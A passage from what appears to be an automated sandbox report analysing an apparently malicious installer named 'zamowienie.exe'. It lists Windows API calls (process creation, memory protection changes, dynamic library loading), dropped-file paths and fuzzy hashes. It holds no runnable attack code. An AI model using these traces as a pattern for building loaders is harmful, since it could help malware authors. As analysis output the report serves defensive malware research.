                                                                                                                                              • WriteFile.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,0040C55F,0040B8F8,0040342A,0040B8F8,0040C55F,004138F8,00004000,?,00000000,00403254,00000004), ref: 0040600C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(7340504C,?,?,7340503C), ref: 734029CF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,00420130,?,?,004062D2,00420130,?,?,?,00000000,?), ref: 00406268
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              APIs
                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015CD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                                              • Instruction ID: 22c1aa84a1f1daebfb6059ce5be08a21359d6724d85e2e0e533240bbdcf4b3d7
                                                                                                                                              • Opcode Fuzzy Hash: 1c732426b319a58644122993fcc2576965abff77efdecfc0694fb1aac6d17fc3
                                                                                                                                              • Instruction Fuzzy Hash: B4D01232704214DBDF60DBE49F0869E7364EB50325B204137D111F21D1D6B9C5529B1D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                                              • Instruction ID: 95ec8208bb9d3a01d591897c0f28f5e1a7c334172ea667dd54b0e9ef813c1122
                                                                                                                                              • Opcode Fuzzy Hash: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                                              • Instruction Fuzzy Hash: 8DB01279381701BBDE619B40DF09F857E62E7A4B01F018038B344240F0CAB200A1DB1C
                                                                                                                                              APIs
                                                                                                                                              • ShellExecuteExA.SHELL32(?,004048A5,?), ref: 00405AA9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 587946157-0
                                                                                                                                              • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                              • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                                                              • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                              • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004031A7,?), ref: 004034B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                                              • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                                                                                                              • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                                              • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                                • Part of subcall function 00405A57: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,00426800,00426800,00426800,?,948,00000000), ref: 00405A80
                                                                                                                                                • Part of subcall function 00405A57: CloseHandle.KERNEL32(?), ref: 00405A8D
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                                                                                                                                • Part of subcall function 0040685B: WaitForSingleObject.KERNEL32(?,?), ref: 0040686C
                                                                                                                                                • Part of subcall function 0040685B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040688E
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: 336fd67ccc8e735512a1efe94d0d3fa4335e613bb5c76ac875107bd3aece32d2
                                                                                                                                              • Instruction ID: 6326f8cf37e97362563a4a525c4747758c0656ae9550c1d9405d456246959b30
                                                                                                                                              • Opcode Fuzzy Hash: 336fd67ccc8e735512a1efe94d0d3fa4335e613bb5c76ac875107bd3aece32d2
                                                                                                                                              • Instruction Fuzzy Hash: C3F03032A051219BCF20BBA58D899EF62A4DB41318B11813FE512B21D1C77C4A469EAE
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040569F
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004056AE
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004056EB
                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004056F2
                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405713
                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405724
                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405737
                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405745
                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405758
                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040577A
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 0040578E
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004057AF
                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004057BF
                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004057D8
                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004057E4
                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004056BD
                                                                                                                                                • Part of subcall function 00404493: SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405800
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000055D4,00000000), ref: 0040580E
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405815
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405838
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 0040583F
                                                                                                                                              • ShowWindow.USER32(?), ref: 00405885
                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004058B9
                                                                                                                                              • CreatePopupMenu.USER32 ref: 004058CA
                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004058DF
                                                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 004058FF
                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405918
                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405954
                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405964
                                                                                                                                              • EmptyClipboard.USER32 ref: 0040596A
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405973
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040597D
                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405991
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004059AA
                                                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 004059B5
                                                                                                                                              • CloseClipboard.USER32 ref: 004059BB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                              • String ID: PB
                                                                                                                                              • API String ID: 590372296-3672992855
                                                                                                                                              • Opcode ID: 9ece42787bb4c3c3e099679d76c11b7cb09ab47a378a4b394defb0c137757d26
                                                                                                                                              • Instruction ID: fd6102db3f661a96db88c4cff4165c9fe2bd5cf480e5840d44d2693fce9adf5f
                                                                                                                                              • Opcode Fuzzy Hash: 9ece42787bb4c3c3e099679d76c11b7cb09ab47a378a4b394defb0c137757d26
                                                                                                                                              • Instruction Fuzzy Hash: F2A14AB1A00208FFDB11AFA0DE85AAE7F79EB08355F10403AFA44B61A1C7754E51DF68
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040493F
                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404969
                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041FD28,?), ref: 00404A1A
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404A25
                                                                                                                                              • lstrcmpiA.KERNEL32(Call,00420950), ref: 00404A57
                                                                                                                                              • lstrcatA.KERNEL32(?,Call), ref: 00404A63
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404A75
                                                                                                                                                • Part of subcall function 00405AB8: GetDlgItemTextA.USER32(?,?,00000400,00404AAC), ref: 00405ACB
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,*?|<>/":,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406710
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,?,?,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 0040671D
                                                                                                                                                • Part of subcall function 004066B8: CharNextA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406722
                                                                                                                                                • Part of subcall function 004066B8: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406732
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041F920,?,?,0000040F,?,0041F920,0041F920,?,?,0041F920,?,?,000003FB,?), ref: 00404B33
                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404B4E
                                                                                                                                                • Part of subcall function 00404CA7: lstrlenA.KERNEL32(00420950,00420950,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404BC2,000000DF,00000000,00000400,?), ref: 00404D45
                                                                                                                                                • Part of subcall function 00404CA7: wsprintfA.USER32 ref: 00404D4D
                                                                                                                                                • Part of subcall function 00404CA7: SetDlgItemTextA.USER32(?,00420950), ref: 00404D60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: A$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$Call$PB
                                                                                                                                              • API String ID: 2624150263-3707865174
                                                                                                                                              • Opcode ID: dc3a5bef0da5bcdd42e5caf87009513b1d7617797e8e1c3746d9564e8cea5adf
                                                                                                                                              • Instruction ID: e3545aa31a324473be50b27f7f7490420232d739f89f18fc579bf95e57ac48cb
                                                                                                                                              • Opcode Fuzzy Hash: dc3a5bef0da5bcdd42e5caf87009513b1d7617797e8e1c3746d9564e8cea5adf
                                                                                                                                              • Instruction Fuzzy Hash: 76A16FB1A01209ABDB11AFA5CD45BAF77B8EF84314F10803BF601B62D1D77C9A418B6D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 734012A5: GlobalAlloc.KERNEL32(?,734012C3,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012AD
                                                                                                                                              • GlobalAlloc.KERNEL32(?,000014A4), ref: 73401C54
                                                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 73401C9C
                                                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 73401CA6
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401CB9
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401D99
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401D9E
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401DA3
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401F8A
                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 73402128
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000008), ref: 734021A4
                                                                                                                                              • LoadLibraryA.KERNEL32(00000008), ref: 734021B5
                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 7340220E
                                                                                                                                              • lstrlenA.KERNEL32(00000408), ref: 73402228
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 245916457-0
                                                                                                                                              • Opcode ID: 603b57035bbbe0a21eb7e7effc595f72e7ac09fe7ac7a33cb47aecaa36af7403
                                                                                                                                              • Instruction ID: 8947829940f61a83e6a102c7ac974d3c761582a0bfdbca04397e61e572bbd683
                                                                                                                                              • Opcode Fuzzy Hash: 603b57035bbbe0a21eb7e7effc595f72e7ac09fe7ac7a33cb47aecaa36af7403
                                                                                                                                              • Instruction Fuzzy Hash: 7822AC79F0420ADFDB1A9FA4C9807ADBBF5BF04304F1485BED1A6A22C0E7749542CB58
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                              • Opcode ID: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                                              • Instruction ID: a10ff3317a7d934d21c6305b1d4d8d4805c4e4a6efc72f35853891d037137daf
                                                                                                                                              • Opcode Fuzzy Hash: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                                              • Instruction Fuzzy Hash: 47F0A771604110DFDB50E7A49E49BEE7768AF61314F60017BE141B20C1C6B849529B2E
                                                                                                                                              APIs
                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404654
                                                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404668
                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404686
                                                                                                                                              • GetSysColor.USER32(?), ref: 00404697
                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004046A6
                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004046B5
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004046B8
                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004046C7
                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004046DC
                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040473E
                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00404741
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040476C
                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004047AC
                                                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004047BB
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004047C4
                                                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004047DA
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004047DD
                                                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404809
                                                                                                                                              • SendMessageA.USER32(?,00000000,00000000), ref: 0040481D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                              • String ID: N$2B
                                                                                                                                              • API String ID: 3103080414-1121222966
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                              • DrawTextA.USER32(00000000,Noncomplacency,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                              • String ID: F$Noncomplacency
                                                                                                                                              • API String ID: 941294808-1629299209
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,004061B8,?,?), ref: 00406058
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,004226E0,00000400), ref: 00406061
                                                                                                                                                • Part of subcall function 00405EB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EC6
                                                                                                                                                • Part of subcall function 00405EB6: lstrlenA.KERNEL32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EF8
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 0040607E
                                                                                                                                              • wsprintfA.USER32 ref: 0040609C
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422AE0,C0000000,?,00422AE0,?,?,?,?,?), ref: 004060D7
                                                                                                                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060E6
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040611E
                                                                                                                                              • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004222E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406174
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406185
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040618C
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                              • String ID: %s=%s$[Rename]$&B$*B$*B
                                                                                                                                              • API String ID: 2171350718-779947378
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                              • lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
